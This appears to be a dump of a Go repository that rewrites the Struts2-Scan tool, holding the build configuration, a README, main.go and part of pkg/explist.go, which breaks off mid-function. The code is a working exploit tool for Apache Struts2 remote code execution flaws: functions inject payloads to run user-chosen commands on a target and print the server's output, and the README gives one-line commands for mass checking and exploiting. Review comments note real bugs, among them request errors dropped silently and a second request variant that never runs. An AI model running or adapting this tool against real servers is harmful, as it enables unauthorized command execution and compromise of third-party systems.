├── .github ├── conf │ └── .goreleaser.yml └── workflows │ └── release1.yml ├── .idea ├── .gitignore ├── GolangStruts2.iml ├── modules.xml └── vcs.xml ├── README.md ├── go.mod ├── go.sum ├── main.go └── pkg ├── explist.go └── utils └── utils.go /.github/conf/.goreleaser.yml: -------------------------------------------------------------------------------- 1 | before: 2 | hooks: 3 | - sudo apt -y install libprotobuf-dev protobuf-compiler protoc-gen-go 4 | - go mod tidy 5 | - go generate ./... 6 | builds: 7 | - id: "with-upx" 8 | env: 9 | - CGO_ENABLED=0 10 | goos: 11 | - linux 12 | - windows 13 | - darwin 14 | goarch: 15 | - amd64 16 | - arm64 17 | - arm 18 | - "386" 19 | goarm: 20 | - "6" 21 | - "7" 22 | flags: 23 | - -trimpath 24 | ldflags: 25 | - -s -w -X main.version={{.Version}} -X main.commit={{.Commit}} -X main.date={{ .CommitDate }} -X main.builtBy=goreleaser 26 | ignore: 27 | - goos: windows 28 | goarch: arm64 29 | - goos: windows 30 | goarch: arm 31 | - goos: linux 32 | goarch: mips64 33 | hooks: 34 | post: upx --best -f -q "{{ .Path }}" 35 | 36 | # UnknownExecutableFormatException 37 | # CantPackException: can't pack new-exe 38 | - id: "without-upx" 39 | env: 40 | - CGO_ENABLED=0 41 | goos: 42 | - linux 43 | - windows 44 | - darwin 45 | goarch: 46 | - mips64 47 | - arm 48 | goarm: 49 | - "6" 50 | - "7" 51 | flags: 52 | - -trimpath 53 | ldflags: 54 | - -s -w -X main.version={{.Version}} -X main.commit={{.Commit}} -X main.date={{ .CommitDate }} -X main.builtBy=goreleaser 55 | ignore: 56 | - goos: linux 57 | goarch: arm 58 | 59 | 60 | archives: 61 | - format: zip 62 | name_template: '{{ .ProjectName }}_{{ .Os }}_{{ .Arch }}{{ if .Arm }}v{{ .Arm }}{{ end }}' 63 | checksum: 64 | name_template: 'checksums.txt' 65 | snapshot: 66 | name_template: "{{ incpatch .Version }}-next" 67 | changelog: 68 | sort: asc 69 | filters: 70 | exclude: 71 | - '^docs:' 72 | - '^test:' -------------------------------------------------------------------------------- 
/.github/workflows/release1.yml: -------------------------------------------------------------------------------- 1 | name: goreleaser 2 | 3 | on: 4 | push: 5 | tags: 6 | - '*' 7 | 8 | permissions: 9 | contents: write 10 | 11 | jobs: 12 | goreleaser: 13 | runs-on: ubuntu-latest 14 | timeout-minutes: 60 15 | steps: 16 | - 17 | name: Checkout 18 | uses: actions/checkout@v4 19 | with: 20 | fetch-depth: 0 21 | - 22 | name: Set up Go 23 | uses: actions/setup-go@v4 24 | with: 25 | go-version-file: 'go.mod' 26 | check-latest: true 27 | - 28 | name: Run GoReleaser 29 | uses: goreleaser/goreleaser-action@v4 30 | with: 31 | distribution: goreleaser 32 | version: latest 33 | args: -f .github/conf/.goreleaser.yml 34 | workdir: . 35 | env: 36 | GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} -------------------------------------------------------------------------------- /.idea/.gitignore: -------------------------------------------------------------------------------- 1 | # 默认忽略的文件 2 | /shelf/ 3 | /workspace.xml 4 | # 基于编辑器的 HTTP 客户端请求 5 | /httpRequests/ 6 | # Datasource local storage ignored files 7 | /dataSources/ 8 | /dataSources.local.xml 9 | -------------------------------------------------------------------------------- /.idea/GolangStruts2.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /.idea/modules.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /.idea/vcs.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 
用Golang重写[Struts2-Scan](https://github.com/HatBoy/Struts2-Scan)项目。 2 | 3 | 工具参数说明 4 | ``` 5 | Usage of main.exe: 6 | -u url 7 | you target, example: https://192.168.1.1 8 | -c command 9 | you want execute command, example: "whoami" 10 | -n name 11 | 漏洞名,可选S2-001, S2-003, S2-005, S2-007, S2-008, S2-009, S2-012, S2-013, S2-015, S2-016, S2-019, 12 | S2-029, S2-032, S2-033, S2-037, S2-045, S2-046, S2-048, S2-052, S2-053, S2-devMode, S2-057,allPoc(除了s2-052) 13 | (单独使用POC | EXP 例: S2-001 | s2-001_Cmd | s2-001_WebPath) 14 | -d data 15 | POST , 需要使用的payload使用{exp}填充, 如: name=test&passwd={exp} 16 | -t Type 17 | 指定contentType头 18 | ``` 19 | 20 | + 一键检测 21 | 22 | ``` 23 | GolangStruts2.exe -u http://127.0.0.1 -n allPoc 24 | ``` 25 | 26 | + 单个利用 27 | 28 | ``` 29 | GolangStruts2.exe -u http://127.0.0.1 -n S2-001 -c whoami 30 | ``` 31 | -------------------------------------------------------------------------------- /go.mod: -------------------------------------------------------------------------------- 1 | module Struts2Scan 2 | 3 | go 1.21 4 | 5 | require ( 6 | github.com/fatih/color v1.14.1 7 | github.com/imroc/req/v3 v3.42.1 8 | ) 9 | 10 | require ( 11 | github.com/andybalholm/brotli v1.0.6 // indirect 12 | github.com/cloudflare/circl v1.3.6 // indirect 13 | github.com/gaukas/godicttls v0.0.4 // indirect 14 | github.com/go-task/slim-sprig v0.0.0-20230315185526-52ccab3ef572 // indirect 15 | github.com/google/pprof v0.0.0-20231101202521-4ca4178f5c7a // indirect 16 | github.com/hashicorp/errwrap v1.1.0 // indirect 17 | github.com/hashicorp/go-multierror v1.1.1 // indirect 18 | github.com/klauspost/compress v1.17.2 // indirect 19 | github.com/mattn/go-colorable v0.1.13 // indirect 20 | github.com/mattn/go-isatty v0.0.17 // indirect 21 | github.com/onsi/ginkgo/v2 v2.13.1 // indirect 22 | github.com/quic-go/qpack v0.4.0 // indirect 23 | github.com/quic-go/qtls-go1-20 v0.4.1 // indirect 24 | github.com/quic-go/quic-go v0.40.0 // indirect 25 | github.com/refraction-networking/utls 
v1.5.4 // indirect 26 | github.com/stretchr/testify v1.8.0 // indirect 27 | go.uber.org/mock v0.3.0 // indirect 28 | golang.org/x/crypto v0.15.0 // indirect 29 | golang.org/x/exp v0.0.0-20231110203233-9a3e6036ecaa // indirect 30 | golang.org/x/mod v0.14.0 // indirect 31 | golang.org/x/net v0.18.0 // indirect 32 | golang.org/x/sys v0.14.0 // indirect 33 | golang.org/x/text v0.14.0 // indirect 34 | golang.org/x/tools v0.15.0 // indirect 35 | ) 36 | -------------------------------------------------------------------------------- /go.sum: -------------------------------------------------------------------------------- 1 | github.com/andybalholm/brotli v1.0.6 h1:Yf9fFpf49Zrxb9NlQaluyE92/+X7UVHlhMNJN2sxfOI= 2 | github.com/andybalholm/brotli v1.0.6/go.mod h1:fO7iG3H7G2nSZ7m0zPUDn85XEX2GTukHGRSepvi9Eig= 3 | github.com/cloudflare/circl v1.3.6 h1:/xbKIqSHbZXHwkhbrhrt2YOHIwYJlXH94E3tI/gDlUg= 4 | github.com/cloudflare/circl v1.3.6/go.mod h1:5XYMA4rFBvNIrhs50XuiBJ15vF2pZn4nnUKZrLbUZFA= 5 | github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= 6 | github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c= 7 | github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= 8 | github.com/fatih/color v1.14.1 h1:qfhVLaG5s+nCROl1zJsZRxFeYrHLqWroPOQ8BWiNb4w= 9 | github.com/fatih/color v1.14.1/go.mod h1:2oHN61fhTpgcxD3TSWCgKDiH1+x4OiDVVGH8WlgGZGg= 10 | github.com/gaukas/godicttls v0.0.4 h1:NlRaXb3J6hAnTmWdsEKb9bcSBD6BvcIjdGdeb0zfXbk= 11 | github.com/gaukas/godicttls v0.0.4/go.mod h1:l6EenT4TLWgTdwslVb4sEMOCf7Bv0JAK67deKr9/NCI= 12 | github.com/go-logr/logr v1.3.0 h1:2y3SDp0ZXuc6/cjLSZ+Q3ir+QB9T/iG5yYRXqsagWSY= 13 | github.com/go-logr/logr v1.3.0/go.mod h1:9T104GzyrTigFIr8wt5mBrctHMim0Nb2HLGrmQ40KvY= 14 | github.com/go-task/slim-sprig v0.0.0-20230315185526-52ccab3ef572 h1:tfuBGBXKqDEevZMzYi5KSi8KkcZtzBcTgAUUtapy0OI= 15 | github.com/go-task/slim-sprig v0.0.0-20230315185526-52ccab3ef572/go.mod 
h1:9Pwr4B2jHnOSGXyyzV8ROjYa2ojvAY6HCGYYfMoC3Ls= 16 | github.com/golang/protobuf v1.5.3 h1:KhyjKVUg7Usr/dYsdSqoFveMYd5ko72D+zANwlG1mmg= 17 | github.com/golang/protobuf v1.5.3/go.mod h1:XVQd3VNwM+JqD3oG2Ue2ip4fOMUkwXdXDdiuN0vRsmY= 18 | github.com/google/go-cmp v0.6.0 h1:ofyhxvXcZhMsU5ulbFiLKl/XBFqE1GSq7atu8tAmTRI= 19 | github.com/google/go-cmp v0.6.0/go.mod h1:17dUlkBOakJ0+DkrSSNjCkIjxS6bF9zb3elmeNGIjoY= 20 | github.com/google/pprof v0.0.0-20231101202521-4ca4178f5c7a h1:fEBsGL/sjAuJrgah5XqmmYsTLzJp/TO9Lhy39gkverk= 21 | github.com/google/pprof v0.0.0-20231101202521-4ca4178f5c7a/go.mod h1:czg5+yv1E0ZGTi6S6vVK1mke0fV+FaUhNGcd6VRS9Ik= 22 | github.com/hashicorp/errwrap v1.0.0/go.mod h1:YH+1FKiLXxHSkmPseP+kNlulaMuP3n2brvKWEqk/Jc4= 23 | github.com/hashicorp/errwrap v1.1.0 h1:OxrOeh75EUXMY8TBjag2fzXGZ40LB6IKw45YeGUDY2I= 24 | github.com/hashicorp/errwrap v1.1.0/go.mod h1:YH+1FKiLXxHSkmPseP+kNlulaMuP3n2brvKWEqk/Jc4= 25 | github.com/hashicorp/go-multierror v1.1.1 h1:H5DkEtf6CXdFp0N0Em5UCwQpXMWke8IA0+lD48awMYo= 26 | github.com/hashicorp/go-multierror v1.1.1/go.mod h1:iw975J/qwKPdAO1clOe2L8331t/9/fmwbPZ6JB6eMoM= 27 | github.com/imroc/req/v3 v3.42.1 h1:g82SouLvX7pqwqJjpQJYrVvuI+LOycWhyuwxtLlyQJk= 28 | github.com/imroc/req/v3 v3.42.1/go.mod h1:W7dOrfQORA9nFoj+CafIZ6P5iyk+rWdbp2sffOAvABU= 29 | github.com/klauspost/compress v1.17.2 h1:RlWWUY/Dr4fL8qk9YG7DTZ7PDgME2V4csBXA8L/ixi4= 30 | github.com/klauspost/compress v1.17.2/go.mod h1:ntbaceVETuRiXiv4DpjP66DpAtAGkEQskQzEyD//IeE= 31 | github.com/mattn/go-colorable v0.1.13 h1:fFA4WZxdEF4tXPZVKMLwD8oUnCTTo08duU7wxecdEvA= 32 | github.com/mattn/go-colorable v0.1.13/go.mod h1:7S9/ev0klgBDR4GtXTXX8a3vIGJpMovkB8vQcUbaXHg= 33 | github.com/mattn/go-isatty v0.0.16/go.mod h1:kYGgaQfpe5nmfYZH+SKPsOc2e4SrIfOl2e/yFXSvRLM= 34 | github.com/mattn/go-isatty v0.0.17 h1:BTarxUcIeDqL27Mc+vyvdWYSL28zpIhv3RoTdsLMPng= 35 | github.com/mattn/go-isatty v0.0.17/go.mod h1:kYGgaQfpe5nmfYZH+SKPsOc2e4SrIfOl2e/yFXSvRLM= 36 | github.com/onsi/ginkgo/v2 v2.13.1 
h1:LNGfMbR2OVGBfXjvRZIZ2YCTQdGKtPLvuI1rMCCj3OU= 37 | github.com/onsi/ginkgo/v2 v2.13.1/go.mod h1:XStQ8QcGwLyF4HdfcZB8SFOS/MWCgDuXMSBe6zrvLgM= 38 | github.com/onsi/gomega v1.29.0 h1:KIA/t2t5UBzoirT4H9tsML45GEbo3ouUnBHsCfD2tVg= 39 | github.com/onsi/gomega v1.29.0/go.mod h1:9sxs+SwGrKI0+PWe4Fxa9tFQQBG5xSsSbMXOI8PPpoQ= 40 | github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM= 41 | github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= 42 | github.com/quic-go/qpack v0.4.0 h1:Cr9BXA1sQS2SmDUWjSofMPNKmvF6IiIfDRmgU0w1ZCo= 43 | github.com/quic-go/qpack v0.4.0/go.mod h1:UZVnYIfi5GRk+zI9UMaCPsmZ2xKJP7XBUvVyT1Knj9A= 44 | github.com/quic-go/qtls-go1-20 v0.4.1 h1:D33340mCNDAIKBqXuAvexTNMUByrYmFYVfKfDN5nfFs= 45 | github.com/quic-go/qtls-go1-20 v0.4.1/go.mod h1:X9Nh97ZL80Z+bX/gUXMbipO6OxdiDi58b/fMC9mAL+k= 46 | github.com/quic-go/quic-go v0.40.0 h1:GYd1iznlKm7dpHD7pOVpUvItgMPo/jrMgDWZhMCecqw= 47 | github.com/quic-go/quic-go v0.40.0/go.mod h1:PeN7kuVJ4xZbxSv/4OX6S1USOX8MJvydwpTx31vx60c= 48 | github.com/refraction-networking/utls v1.5.4 h1:9k6EO2b8TaOGsQ7Pl7p9w6PUhx18/ZCeT0WNTZ7Uw4o= 49 | github.com/refraction-networking/utls v1.5.4/go.mod h1:SPuDbBmgLGp8s+HLNc83FuavwZCFoMmExj+ltUHiHUw= 50 | github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME= 51 | github.com/stretchr/objx v0.4.0/go.mod h1:YvHI0jy2hoMjB+UWwv71VJQ9isScKT/TqJzVSSt89Yw= 52 | github.com/stretchr/testify v1.6.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= 53 | github.com/stretchr/testify v1.7.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= 54 | github.com/stretchr/testify v1.8.0 h1:pSgiaMZlXftHpm5L7V1+rVB+AZJydKsMxsQBIJw4PKk= 55 | github.com/stretchr/testify v1.8.0/go.mod h1:yNjHg4UonilssWZ8iaSj1OCr/vHnekPRkoO+kdMU+MU= 56 | go.uber.org/mock v0.3.0 h1:3mUxI1No2/60yUYax92Pt8eNOEecx2D3lcXZh2NEZJo= 57 | go.uber.org/mock v0.3.0/go.mod h1:a6FSlNadKUHUa9IP5Vyt1zh4fC7uAwxMutEAscFbkZc= 58 | golang.org/x/crypto 
v0.15.0 h1:frVn1TEaCEaZcn3Tmd7Y2b5KKPaZ+I32Q2OA3kYp5TA= 59 | golang.org/x/crypto v0.15.0/go.mod h1:4ChreQoLWfG3xLDer1WdlH5NdlQ3+mwnQq1YTKY+72g= 60 | golang.org/x/exp v0.0.0-20231110203233-9a3e6036ecaa h1:FRnLl4eNAQl8hwxVVC17teOw8kdjVDVAiFMtgUdTSRQ= 61 | golang.org/x/exp v0.0.0-20231110203233-9a3e6036ecaa/go.mod h1:zk2irFbV9DP96SEBUUAy67IdHUaZuSnrz1n472HUCLE= 62 | golang.org/x/mod v0.14.0 h1:dGoOF9QVLYng8IHTm7BAyWqCqSheQ5pYWGhzW00YJr0= 63 | golang.org/x/mod v0.14.0/go.mod h1:hTbmBsO62+eylJbnUtE2MGJUyE7QWk4xUqPFrRgJ+7c= 64 | golang.org/x/net v0.18.0 h1:mIYleuAkSbHh0tCv7RvjL3F6ZVbLjq4+R7zbOn3Kokg= 65 | golang.org/x/net v0.18.0/go.mod h1:/czyP5RqHAH4odGYxBJ1qz0+CE5WZ+2j1YgoEo8F2jQ= 66 | golang.org/x/sys v0.0.0-20220811171246-fbc7d0a398ab/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= 67 | golang.org/x/sys v0.14.0 h1:Vz7Qs629MkJkGyHxUlRHizWJRG2j8fbQKjELVSNhy7Q= 68 | golang.org/x/sys v0.14.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA= 69 | golang.org/x/text v0.14.0 h1:ScX5w1eTa3QqT8oi6+ziP7dTV1S2+ALU0bI+0zXKWiQ= 70 | golang.org/x/text v0.14.0/go.mod h1:18ZOQIKpY8NJVqYksKHtTdi31H5itFRjB5/qKTNYzSU= 71 | golang.org/x/tools v0.15.0 h1:zdAyfUGbYmuVokhzVmghFl2ZJh5QhcfebBgmVPFYA+8= 72 | golang.org/x/tools v0.15.0/go.mod h1:hpksKq4dtpQWS1uQ61JkdqWM3LscIS6Slf+VVkm+wQk= 73 | google.golang.org/protobuf v1.28.0 h1:w43yiav+6bVFTBQFZX0r7ipe9JQ1QsbMgHwbBziscLw= 74 | google.golang.org/protobuf v1.28.0/go.mod h1:HV8QOd/L58Z+nl8r43ehVNZIU/HEI6OcFqwMG9pJV4I= 75 | gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= 76 | gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= 77 | gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA= 78 | gopkg.in/yaml.v3 v3.0.1/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= 79 | -------------------------------------------------------------------------------- /main.go: 
-------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "flag" 5 | "fmt" 6 | "os" 7 | ) 8 | /* Command-line inputs; filled in by flag.Parse in main and then copied into a WorkExp. */ 9 | var ( 10 | url string 11 | command string 12 | Name string 13 | Data string 14 | Type string 15 | ) 16 | /* usage prints the help text; main installs it as flag.Usage and also calls it directly when -u or -n is missing. */ 17 | func usage() { 18 | fmt.Println(`Usage of main.exe: 19 | -u url 20 | you target, example: https://192.168.1.1 21 | -c command 22 | you want execute command, example: "whoami" 23 | -n name 24 | 漏洞名,可选S2-001, S2-003, S2-005, S2-007, S2-008, S2-009, S2-012, S2-013, S2-015, S2-016, S2-019, 25 | S2-029, S2-032, S2-033, S2-037, S2-045, S2-046, S2-048, S2-052, S2-053, S2-devMode, S2-057,allPoc(除了s2-052) 26 | (单独使用POC | EXP 例: S2-001 | s2-001_Cmd | s2-001_WebPath) 27 | -d data 28 | 指定POST参数 29 | -t Type 30 | 指定contentType头`) 31 | } 32 | /* banner prints the ASCII-art banner to stdout. */ 33 | func banner() { 34 | ban := ` 35 | ███████╗████████╗██████╗ ██╗ ██╗████████╗███████╗██████╗ ██████╗ ██████╗ 36 | ██╔════╝╚══██╔══╝██╔══██╗██║ ██║╚══██╔══╝██╔════╝╚════██╗ ██╔════╝ ██╔═══██╗ 37 | ███████╗ ██║ ██████╔╝██║ ██║ ██║ ███████╗ █████╔╝ ██║ ███╗██║ ██║ 38 | ╚════██║ ██║ ██╔══██╗██║ ██║ ██║ ╚════██║██╔═══╝ ██║ ██║██║ ██║ 39 | ███████║ ██║ ██║ ██║╚██████╔╝ ██║ ███████║███████╗██╗╚██████╔╝╚██████╔╝ 40 | ╚══════╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚══════╝╚══════╝╚═╝ ╚═════╝ ╚═════╝ by Nu1r` 41 | fmt.Println(ban) 42 | } 43 | /* main parses the flags, prints the banner, shows usage when -u or -n is absent, then builds a WorkExp from the flag values and calls its Run method. */ 44 | func main() { 45 | flag.StringVar(&url, "u", "", "your target") 46 | flag.StringVar(&command, "c", "", "command") 47 | flag.StringVar(&Name, "n", "", "(单独使用POC | EXP 例: S2-001 | s2-001_Cmd | s2-001_WebPath)") 48 | flag.StringVar(&Data, "d", "", "POST参数") 49 | flag.StringVar(&Type, "t", "", "指定contentType头") 50 | flag.Usage = usage 51 | flag.Parse() 52 | banner() 53 | 54 | if url == "" || Name == "" { 55 | usage() 56 | os.Exit(0) /* NOTE(review): a usage error exits with status 0, so a wrapper script cannot tell it apart from a successful run; the flag package itself uses exit status 2 for bad arguments. */ 57 | } 58 | /* NOTE(review): WorkExp is declared in pkg/explist.go, which also says "package main"; as laid out in this listing those are two separate directories and main.go imports nothing that would bring WorkExp into scope — confirm the files really share one package before relying on this build. */ 59 | Exp := WorkExp{ 60 | Url: url, // URL 61 | Cmd: command, // command 62 | /* PoC check, command execution, web root path read 63 | S2-001, S2-003, S2-005, S2-007, S2-008, S2-009, S2-012, S2-013, S2-015, S2-016, S2-019, 64 | S2-029, S2-032, 
S2-033, S2-037, S2-045, S2-046, S2-048, S2-052, S2-053, S2-devMode, S2-057,allPoc (all except s2-052) 65 | (single PoC | EXP, e.g.: S2-001 | s2-001_Cmd | s2-001_WebPath) 66 | */ 67 | CveName: Name, 68 | postData: Data, // POST | GET parameters; put {exp} where the payload should be substituted, e.g. name=test&passwd={exp} 69 | contentType: Type, // e.g. application/x-www-form-urlencoded 70 | } 71 | Exp.Run() /* Run is not shown in this listing; presumably it dispatches on CveName — verify. */ 72 | } 73 | -------------------------------------------------------------------------------- /pkg/explist.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "Struts2Scan/pkg/utils" 5 | "fmt" 6 | "github.com/fatih/color" 7 | "github.com/imroc/req/v3" 8 | "math/rand" 9 | "strconv" 10 | "strings" 11 | "time" 12 | ) 13 | /* WorkExp carries one target plus the user's options. Note that the Poc and Exp methods do not treat it as read-only: they overwrite postData (and in some cases Url) on the receiver as they build requests. */ 14 | type WorkExp struct { 15 | Url string // url; must already carry a parameter 16 | Cmd string 17 | CveName string 18 | postData string // POST | GET parameters; put {exp} where the payload should be substituted, e.g. name=test&passwd={exp} 19 | contentType string // defaults to application/x-www-form-urlencoded 20 | } 21 | /* Shared HTTP client: fixed User-Agent from utils, 5 s timeout, and per-request dumps enabled. The dump captures each request on the wire — presumably including the body with its payload — so wherever the dump is surfaced (not shown here) that output should be treated as sensitive. */ 22 | var client = req.C(). 23 | SetUserAgent(utils.GlobalUserAgent). 24 | SetTimeout(5 * time.Second). 25 | EnableDumpEachRequest() 26 | 27 | // PocS001 S2-001: affected versions Struts 2.0.0-2.0.8; data sent via POST; default parameters: username, password; supports web path retrieval and arbitrary command execution 28 | func (c *WorkExp) PocS001() { 29 | var ( 30 | resp *req.Response 31 | err error 32 | ) 33 | r1 := rand.Intn(10000) + 1000 34 | r2 := rand.Intn(10000) + 1000 /* The check asks the target to evaluate r1+r2 and then looks for the sum in the response body; with go 1.21 in go.mod, math/rand is auto-seeded, so the two values differ between runs. */ 35 | Payload := strings.Replace(utils.ExecPayload, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1) 36 | Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1) 37 | Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1) 38 | /* NOTE(review): this overwrites c.postData on the receiver, so the second attempt further down and any later method called on the same WorkExp see the already-substituted body rather than the user's template. */ if c.postData == "" { 39 | c.postData = "username=" + Payload 40 | } else { 41 | c.postData = strings.Replace(c.postData, "{exp}", Payload, -1) 42 | } 43 | if c.contentType == "" { 44 | resp, err = client.R(). 45 | SetBody(c.postData). 46 | SetHeader("Content-Type", "application/x-www-form-urlencoded"). 
47 | Post(c.Url) 48 | } else { 49 | resp, err = client.R(). 50 | SetBody(c.postData). 51 | SetHeader("Content-Type", c.contentType). 52 | Post(c.Url) 53 | } 54 | if err != nil { 55 | /* NOTE(review): transport errors (timeout, connection refused, TLS failure) are dropped here; resp is nil in that case, so the function returns without printing anything and the target is reported neither as found nor as "Not Vulnerable". Surface err so a network failure is not silently read as a non-finding. */ 56 | } 57 | if resp != nil { 58 | if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) { 59 | color.Red("*Found Struts2-001!") 60 | } else { 61 | /* NOTE(review): c.postData was already set non-empty above, so this branch cannot run and the "password=" variant is never sent; the else branch re-runs the {exp} replacement on already-substituted data (a no-op) and repeats the first request unchanged. */ if c.postData == "" { 62 | c.postData = "password=" + Payload 63 | } else { 64 | c.postData = strings.Replace(c.postData, "{exp}", Payload, -1) 65 | } 66 | if c.contentType == "" { 67 | resp, err = client.R(). 68 | SetBody(c.postData). 69 | SetHeader("Content-Type", "application/x-www-form-urlencoded"). 70 | Post(c.Url) 71 | } else { 72 | resp, err = client.R(). 73 | SetBody(c.postData). 74 | SetHeader("Content-Type", c.contentType). 75 | Post(c.Url) 76 | } 77 | if err != nil { 78 | /* NOTE(review): same silent drop of the request error as above. */ 79 | } 80 | if resp != nil { 81 | if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) { 82 | color.Red("*Found Struts2-001!") 83 | } else { 84 | fmt.Println("Struts2-001 Not Vulnerable.") 85 | } 86 | } 87 | } 88 | } 89 | } 90 | /* ExpS001Cmd: the same two-request sequence as PocS001, with c.Cmd substituted into the payload and each response body printed verbatim; it shares PocS001's discarded request errors and its in-place overwrite of c.postData. */ 91 | func (c *WorkExp) ExpS001Cmd() { 92 | var ( 93 | resp *req.Response 94 | err error 95 | ) 96 | Payload := strings.Replace(utils.ExecPayload, "{cmd}", c.Cmd, -1) 97 | if c.postData == "" { 98 | c.postData = "username=" + Payload 99 | } else { 100 | c.postData = strings.Replace(c.postData, "{exp}", Payload, -1) 101 | } 102 | if c.contentType == "" { 103 | resp, err = client.R(). 104 | SetBody(c.postData). 105 | SetHeader("Content-Type", "application/x-www-form-urlencoded"). 106 | Post(c.Url) 107 | } else { 108 | resp, err = client.R(). 109 | SetBody(c.postData). 110 | SetHeader("Content-Type", c.contentType). 
111 | Post(c.Url) 112 | } 113 | if err != nil { 114 | 115 | } 116 | if resp != nil { 117 | fmt.Println(resp.String()) 118 | } 119 | 120 | if c.postData == "" { 121 | c.postData = "password=" + Payload 122 | } else { 123 | c.postData = strings.Replace(c.postData, "{exp}", Payload, -1) 124 | } 125 | if c.contentType == "" { 126 | resp, err = client.R(). 127 | SetBody(c.postData). 128 | SetHeader("Content-Type", "application/x-www-form-urlencoded"). 129 | Post(c.Url) 130 | } else { 131 | resp, err = client.R(). 132 | SetBody(c.postData). 133 | SetHeader("Content-Type", c.contentType). 134 | Post(c.Url) 135 | } 136 | if err != nil { 137 | 138 | } 139 | if resp != nil { 140 | fmt.Println(resp.String()) 141 | } 142 | 143 | } 144 | 145 | func (c *WorkExp) ExpS001GetPath() { 146 | var ( 147 | resp *req.Response 148 | err error 149 | ) 150 | if c.postData == "" { 151 | c.postData = "username=" + utils.WebPath 152 | } else { 153 | c.postData = strings.Replace(c.postData, "{exp}", utils.WebPath, -1) 154 | } 155 | if c.contentType == "" { 156 | resp, err = client.R(). 157 | SetBody(c.postData). 158 | SetHeader("Content-Type", "application/x-www-form-urlencoded"). 159 | Post(c.Url) 160 | } else { 161 | resp, err = client.R(). 162 | SetBody(c.postData). 163 | SetHeader("Content-Type", c.contentType). 164 | Post(c.Url) 165 | } 166 | if err != nil { 167 | 168 | } 169 | if resp != nil { 170 | fmt.Println(resp) 171 | } 172 | 173 | if c.postData == "" { 174 | c.postData = "password=" + utils.WebPath 175 | } else { 176 | c.postData = strings.Replace(c.postData, "{exp}", utils.WebPath, -1) 177 | } 178 | if c.contentType == "" { 179 | resp, err = client.R(). 180 | SetBody(c.postData). 181 | SetHeader("Content-Type", "application/x-www-form-urlencoded"). 182 | Post(c.Url) 183 | } else { 184 | resp, err = client.R(). 185 | SetBody(c.postData). 186 | SetHeader("Content-Type", c.contentType). 
187 | Post(c.Url) 188 | } 189 | if err != nil { 190 | 191 | } 192 | if resp != nil { 193 | fmt.Println(resp) 194 | } 195 | } 196 | 197 | // PocS003 S2-003:影响版本Struts 2.0.0-2.0.11.2; GET请求发送数据; 198 | func (c *WorkExp) PocS003() { 199 | r1 := rand.Intn(10000) + 1000 200 | r2 := rand.Intn(10000) + 1000 201 | reqUrl := c.Url + utils.Exec_payload 202 | reqUrl = strings.Replace(reqUrl, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1) 203 | reqUrl = strings.Replace(reqUrl, "{{r1}}", strconv.Itoa(r1), -1) 204 | reqUrl = strings.Replace(reqUrl, "{{r2}}", strconv.Itoa(r2), -1) 205 | resp, err := client.R(). 206 | Get(reqUrl) 207 | if err != nil { 208 | 209 | } 210 | if resp != nil { 211 | if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) { 212 | color.Red("*Found Struts2-003!") 213 | } else { 214 | fmt.Println("Struts2-003 Not Vulnerable.") 215 | } 216 | } 217 | } 218 | 219 | func (c *WorkExp) ExpS003Cmd() { 220 | var ( 221 | resp *req.Response 222 | err error 223 | ) 224 | Payload := strings.Replace(utils.Exec_payload, "{cmd}", c.Cmd, -1) 225 | c.Url = c.Url + Payload 226 | if c.contentType == "" { 227 | resp, err = client.R(). 228 | SetBody(c.postData). 229 | SetHeader("Content-Type", "application/x-www-form-urlencoded"). 230 | Post(c.Url) 231 | } else { 232 | resp, err = client.R(). 233 | SetBody(c.postData). 234 | SetHeader("Content-Type", c.contentType). 235 | Post(c.Url) 236 | } 237 | if err != nil { 238 | 239 | } 240 | if resp != nil { 241 | fmt.Println(resp) 242 | } 243 | } 244 | 245 | // PocS005 S2-005:影响版本Struts 2.0.0-2.1.8.1; GET请求发送数据; 246 | func (c *WorkExp) PocS005() { 247 | r1 := rand.Intn(10000) + 1000 248 | r2 := rand.Intn(10000) + 1000 249 | Payload := c.Url + utils.Exec_payload1 250 | Payload = 